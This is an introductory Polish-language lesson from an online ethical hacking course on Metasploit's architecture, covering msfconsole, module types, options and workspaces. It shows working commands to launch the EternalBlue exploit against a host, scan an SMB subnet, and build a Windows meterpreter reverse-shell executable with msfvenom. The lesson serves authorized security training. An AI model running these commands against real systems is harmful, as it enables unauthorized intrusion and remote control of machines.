0Pricing
Ethical Hacking Academy · Lekcja

Architektura Metasploit

Moduły i konsola

Architektura Metasploit to bezpłatna lekcja Ethical Hacking Academy na CoddyKit. To lekcja 1 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Ethical Hacking Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.

Czym jest Metasploit?

Metasploit to najczęściej używany framework do wykorzystywania luk. Udostępnia uporządkowaną bibliotekę exploitów, payloadów i narzędzi służących do testowania i prezentowania podatności podczas autoryzowanych działań.

Zamiast pisać każdy atak od podstaw, można wczytywać sprawdzone moduły, konfigurować je i uruchamiać za pośrednictwem spójnego interfejsu.

msfconsole

Podstawowym interfejsem jest msfconsole — interaktywna powłoka wiersza poleceń. Oferuje uzupełnianie za pomocą klawisza Tab, historię poleceń i dostęp do każdego modułu.

Uruchamia się ją z terminala, a następnie całą pracę wykonuje się w jej wierszu poleceń.

msfconsole
# msf6 > help

Typy modułów

Metasploit organizuje funkcje w typy modułów:

  • exploit: kod wykorzystujący podatność.
  • payload: kod uruchamiany na celu po wykorzystaniu podatności.
  • auxiliary: skanery, fuzzery i narzędzia, które nie dostarczają payloadu.
  • post: działania po wykorzystaniu podatności na przejętym hoście.
  • encoder i nop: pomagają payloadom omijać wykrywanie.

Nazewnictwo modułów

Moduły używają hierarchicznej ścieżki, która dokładnie informuje, do czego służą. Odczytanie ścieżki ujawnia typ, platformę i usługę docelową.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Exploity a payloady

Ważne rozróżnienie:

  • Exploit to sposób wejścia; przełamuje zabezpieczenia podatnego oprogramowania.
  • Payload określa, co ma się wydarzyć po uzyskaniu dostępu, na przykład otwarcie powłoki.

Łączy się je w pary: jeden exploit może dostarczać wiele różnych payloadów, zależnie od celu i systemu docelowego.

Przebieg pracy z modułem

Praca z dowolnym modułem przebiega według powtarzalnego cyklu:

  • search — wyszukaj moduł.
  • use — wczytaj go.
  • Ustaw options, takie jak RHOSTS i LHOST.
  • run lub exploit — uruchom moduł.

Ta spójność sprawia, że framework można skalować do tysięcy modułów.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Magazyn danych i opcje

Ustawienia modułów znajdują się w magazynie danych (datastore). Każda opcja może być wymagana lub opcjonalna.

  • RHOSTS: zdalny adres lub zdalne adresy celu.
  • RPORT: port zdalny.
  • LHOST: adres nasłuchiwania dla połączeń zwrotnych.
  • LPORT: port nasłuchiwania.

Przed uruchomieniem należy użyć show options, aby sprawdzić wymagania modułu.

Baza danych

Metasploit integruje się z bazą danych PostgreSQL w celu przechowywania hostów, usług, danych zdobyczy i danych uwierzytelniających wykrytych podczas działań. Umożliwia to sprawne śledzenie dużego zakresu testów.

Bazę należy uruchomić przed uruchomieniem konsoli, aby wyniki były zapisywane automatycznie.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Moduły pomocnicze

Moduły auxiliary wykonują użyteczne działania bez wykorzystywania podatności: skanowanie portów, enumerację usług, brute force logowania i fuzzing.

Często są pierwszym krokiem, ponieważ gromadzą informacje potrzebne przed wybraniem exploita.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom to narzędzie towarzyszące służące do generowania samodzielnych payloadów jako plików: plików wykonywalnych, skryptów lub shellcode'u dostarczanego poza konsolą.

Łączy generowanie payloadów i kodowanie w jednym poleceniu, co jest przydatne podczas symulacji phishingu lub niestandardowego dostarczania w autoryzowanych testach.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Obszary robocze

Podczas wielu działań obszary robocze Metasploit utrzymują hosty, usługi i dane zdobyczy każdego klienta w odizolowanych obszarach bazy danych. Można przełączać się między nimi, dzięki czemu dane nie przenikają między ocenami.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Szybkie sprawdzenie

Sprawdź swoją znajomość typów modułów.

Podsumowanie

Dowiedziałeś się, jak zbudowany jest Metasploit:

  • msfconsole to główny interfejs; msfvenom tworzy samodzielne payloady.
  • Typy modułów: exploit, payload, auxiliary, post, encoder/nop.
  • Ścieżki modułów kodują typ, platformę i usługę.
  • Przebieg pracy: search, use, set options, run; ustawienia znajdują się w datastore.
  • Baza danych PostgreSQL śledzi hosty, usługi i dane zdobyczy.

Dalej: skuteczne wyszukiwanie exploitów i korzystanie z nich.

Często zadawane pytania

Czy lekcja „Architektura Metasploit” jest bezpłatna?

Tak — pełny tekst „Architektura Metasploit” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Ethical Hacking Academy, przejdź na CoddyKit PRO. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Architektura Metasploit”?

Moduły i konsola Ćwiczysz Ethical Hacking Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Ethical Hacking Academy?

Nie wymagamy żadnego doświadczenia. Ethical Hacking Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 1 z 4.

Ile czasu zajmuje lekcja „Architektura Metasploit”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Ethical Hacking Academy?

Tak. Każda lekcja Ethical Hacking Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Architektura Metasploit
  2. Wyszukiwanie i używanie exploitów
  3. Payloady i Meterpreter
  4. Moduły po uzyskaniu dostępu
← Powrót do Ethical Hacking Academy